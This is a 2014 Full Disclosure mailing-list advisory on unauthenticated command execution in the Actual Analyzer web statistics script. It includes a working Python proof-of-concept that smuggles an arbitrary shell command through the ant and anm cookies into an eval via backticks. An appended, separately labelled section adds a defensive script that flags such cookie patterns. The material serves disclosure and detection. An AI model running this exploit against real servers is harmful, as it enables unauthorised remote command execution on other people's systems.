[FD] Actual Analyzer Unauthenticated Command Execution
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Actual Analyzer Unauthenticated Command Execution
- From: "Benjamin Harris" <bch@xxxxxxx>
- Date: Thu, 28 Aug 2014 00:21:26 +0100
Hi All
URL: http://www.actualscripts.com/products/analyzer/
I tried to report this a month ago, but got no response from the
developers via the support form on their website, requesting a GPG
key. This is an old vulnerability I found while dusting off some
old hard drives.
Latest still vulnerable.
Brief:
-------------------------
The most popular web statistics tools delivers one big flat list
with statistics for any website. It is very easy in use but for
websites with small amount of pages only. Besides are provided the
primary opportunities for analyses of web site statistics only.
Details:
--------------------------
We control limited characters of an eval. Load commands into unused
variable and use backticks to execute command in short space.
Attached is a POC.
Pre-reqs are that you must know the domain of a website being
tracked by this script.
Many thanks,
Ben
###############################
# ActualAnalyzer exploit.
# Tested on Lite version
# We load command into a dummy variable as we only have 6 characters to own the eval
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################
import urllib
import urllib2
import sys
import time

def banner():
    print " ____ __ __ __ "
    print " / __/_ ______ _ ____ ______/ /___ ______ _/ /___ _____ ____ _/ /_ ______ ___ _____"
    print " / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_ / / _ \/ ___/"
    print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/ __/ / "
    print " /_/ \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ "
    print " /_/ /____/ "

def usage():
    print " [+] Usage:"
    print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
    print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""

banner()
# Arguments are read by position: -h <value> -d <value> -c <value>
if len(sys.argv) < 7:
    usage()
    quit()

domain = sys.argv[2]   # value after -h: host (and path) serving aa.php
command = sys.argv[6]  # value after -c
host = sys.argv[4]     # value after -d: domain tracked by the script

def commandexploit(domain,host,command):
    url = 'http://' + domain + '/aa.php?anp=' + host
    data = None
    # "ant" carries the command; "anm" carries the backticked variable that reaches the eval
    headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
    exploit1 = urllib2.Request(url,data,headers)
    exploit2 = urllib2.urlopen(exploit1)

commandexploit(domain,host,command)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
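
Added example, not part of the original post: a check a defender could run over proxy or WAF request records to flag the cookie pattern the advisory describes (requests to aa.php whose ant or anm cookie carries backticks or variable references). It assumes legitimate ant/anm values contain no shell or PHP metacharacters; the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: legitimate ant/anm values never need shell or PHP
# metacharacters, so any of these in either cookie is suspicious.
SUSPICIOUS = re.compile(r"[`$(){}|&<>\\]")
TRACKER_SCRIPT = "aa.php"          # endpoint named in the advisory
WATCHED_COOKIES = ("ant", "anm")   # cookies named in the advisory


def parse_cookie_header(header):
    """Split a raw Cookie header into a dict without normalising values."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def inspect_request(url, cookie_header):
    """Return (cookie, offending characters) pairs; empty list means clean."""
    path = urlsplit(url).path
    if not path.endswith("/" + TRACKER_SCRIPT):
        return []
    findings = []
    for name, value in parse_cookie_header(cookie_header).items():
        if name in WATCHED_COOKIES:
            hits = sorted(set(SUSPICIOUS.findall(value)))
            if hits:
                findings.append((name, "".join(hits)))
    return findings


# Constructed sample requests (not captured traffic); cookie values in the
# first entry are hypothetical benign values.
SAMPLES = [
    ("/lite/aa.php?anp=example.test", "ant=1409181686; anm=414.1"),
    ("/lite/aa.php?anp=example.test", "ant=PLACEHOLDER_COMMAND; anm=414.`$cot`"),
    ("/index.php", "anm=414.`$cot`"),
]

if __name__ == "__main__":
    for url, cookie in SAMPLES:
        print(url, inspect_request(url, cookie) or "clean")
```

Most web servers do not log Cookie headers by default, so this check needs request records from a proxy, WAF or a log format extended to include them.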